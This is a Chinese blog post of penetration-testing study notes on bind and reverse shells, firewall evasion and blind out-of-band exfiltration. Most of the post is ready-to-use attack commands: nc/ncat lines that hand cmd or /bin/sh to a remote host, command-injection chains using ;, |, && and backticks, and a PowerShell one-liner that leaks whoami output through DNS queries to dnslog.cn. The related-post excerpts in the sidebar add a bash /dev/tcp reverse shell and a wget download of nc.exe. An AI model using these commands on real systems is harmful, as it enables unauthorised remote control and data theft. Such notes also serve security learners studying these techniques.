第五天:反弹shell&不回显带外&正反向链接&文件下载

已于 2023-12-03 22:54:24 修改
阅读量439 收藏 9
点赞数 10
分类专栏: 网络安全 文章标签: 安全
于 2023-12-02 22:59:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40245143/article/details/134759373
版权

第五天:反弹shell&不回显带外&正反向链接&文件下载


正反向链接
常见的渗透测试命令详解
防火墙规则分为出站与入站
出站规则相对宽松,入站规则比较严格,windows系统不自带nc.exe.需要提前准备

1. 文件下载-解决无图形化&解决数据传输

命令生成
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

2. 反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

正向链接与反向链接,站在舔狗的角度:正向链接就是你找女神,反向链接就是女神找你

1、正向连接:本地监听等待对方连接

Linux控制Windows
//绑定CMD到本地5566端口
nc -e cmd -lvp 5566
//主动连接目标5566
ncat 192.168.3.129 5566

Windows控制Linux
//绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 192.168.3.129 5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口
ncat -e /bin/sh 192.168.3.129 5566
//等待5566连接
nc -lvvp 5566

//绑定CMD到目标5566端口
nc -e cmd 192.168.3.129 5566
//等待5566连接
ncat -lvvp 5566

3.防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && ``(特有``和;)
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 `whoami`

4.思路总结

1、判断windows
2、windows没有自带的nc
3、想办法上传nc 反弹权限
4、反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:ping 127.0.0.1 | nc -e cmd 192.168.3.129 5566
开启出站策略,采用正向连接
Linux:ncat -e cmd 192.168.3.129 5566
Windows:ping 127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接

5.防火墙组合数据不回显-ICMP带外查询Dnslog

防火墙规则分为出站与入站
出站规则相对宽松,入站规则比较严格
出站入站都开启策略(数据不回显):OSI网络七层

ping 127.0.0.1 | powershell $x="whoami";$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

漏洞有,但是数据不回显:
1、反弹shell
2、带外查询

为什么要这样写
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行

powershell

$x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z
坠向心
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹shell&数据不回显带外查询&pikaqiu靶场搭建
fencecat的博客
03-04 1191
解决无图形化:当我们想下载一个文件时,通常是通过浏览器的一个链接直接访问网站点击下载的,但是在实际的安全测试中,我们获取的权限只是一个执行命令的窗口,无法获取图形化界面,因此,我们就需要命令来实现文件的上传和下载。比如,当我们想上传一个文件到对方的服务器,我们应该想办法用命令让对方执行下载操作,而不可能直接打开对方的服务器的浏览器去下载,因为我们没有获取这样的权限,只能通过黑窗窗输入命令尝试。Windows->| & || &&Linux->; | || & && ``(特有``和;)
反弹shellDNS
十一.的博客
10-24 170
【代码】反弹shell
第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
IceCream的博客
04-03 1893
常规基本渗透命令详解:https://blog.csdn.net/weixin_43303273/article/details/83029138名词介绍:https://www.cnblogs.com/sunny11/p/13583083.html反弹shell命令生成:https://forum.ywhack.com/bountytips.php?download文件下载:https://forum.ywhack.com/bountytips.php?download**为什么使用命令下载:**文件的上
第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
qq_56414082的博客
10-27 339
在kali中执行wget http://47.100.167.248:8081/NC.exe -O exploit.exe,就可以下载文件。执行命令的时候,会有数据的回显,告诉自己这个命令是不是执行成功,有没有文件,但是在大部分的测试环境是没有回显的或者是回显是不齐全的。这里自己创建一个直接访问www.xiaodi8.com/nc.exe 就可以直接下载的连接。服务器是一台电脑,可以支持多个应用程序同时运行,可以处理多个同时连接,而电脑不能。用户组是一群用户的统称,给以给这个组配置不同的权限。
安全学习DAY05_命令&文件上传&反弹&带外
学废了的阿串的博客
07-20 123
安全学习第五天笔记,渗透命令,常规渗透命令,文件上传,反弹shell带外回显
WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
siu~
09-18 1614
1、SSRF-原理-部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
web安全学习笔记【05】——反弹Shell正反向连接
weixin_42090431的博客
01-21 1145
命令生成:https://forum.ywhack.com/bountytips.php?ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)命令生成:https://forum.ywhack.com/shell.php。windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等。安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等。
linux 反弹shell 教程,浅析Linux之bash反弹shell原理
weixin_29716207的博客
05-04 447
环境攻击机:kali ip:192.168.25.144靶 机:centos ip:192.168.25.142过程kali 监听本地8888端口靶机 centos 写入 反弹shell 的命令bash -i >& /dev/tcp/192.168.25.144/8888 0>&1攻击机 kali 成功反弹shell原理反弹shel...
图书项目:Tomcat版本 & Servlet & Filter & Jsp
06-28
图书项目:Tomcat版本 & Servlet & Filter & Jsp & bootstrap & JavaScript初步 & Ajax初步; 本项目是一个简单的图书管理系统,本博客在tomcat...* 修改图书信息:原有的信息进行回显,修改成功后再回到图书信息页面;
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
shiro-check:Shiro反序列化回显利用,内存壳,检查Burp插件
03-21
四郎检查3.0增加了一些回显有效载荷,增加了基于过滤器(需要对冰蝎客户端pageContext进行改造)和servlet(部分环境需要把参数据进行URL转码)内存冰蝎的支持。 2.0增加了回显,及100个键,20个键的扫描选项,利用...
goecho:用于测试的简单回显服务(例如协调器)
03-21
当前,它具有以下端点: /metrics –有关服务的普罗米修斯指标/version –版本信息/_ready准备检查/* –回显处理程序(将回显有关请求的信息)回声处理程序理解一个查询参数:“ env”。当设置为任何非零长度值时,...
DigettNews:具有Materialize框架的回显存储库
05-08
【标题】"DigettNews:具有Materialize框架的回显存储库" 提供了一个使用Materialize CSS框架构建的新闻页面模板。Materialize是一款基于Google的Material Design设计规范的响应式前端框架,它允许开发者轻松创建美观...
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 838
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1090
区分不同的签名。
Vue的安全性:防范XSS攻击与安全最佳实践
最新发布
哎 你看的博客
07-19 589
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 670
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
vi/vim编辑器入门指南:《Unix&Linux大学教程》精华提炼
- 命令字符与回显:命令字符通常不会显示,但某些特殊如搜索和shell处理命令有回显。 - 命令前缀:多数命令无需前导符,但搜索命令和特殊命令有特定前缀规则。 - 命令执行与确认:大多数命令实时执行,但搜索和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值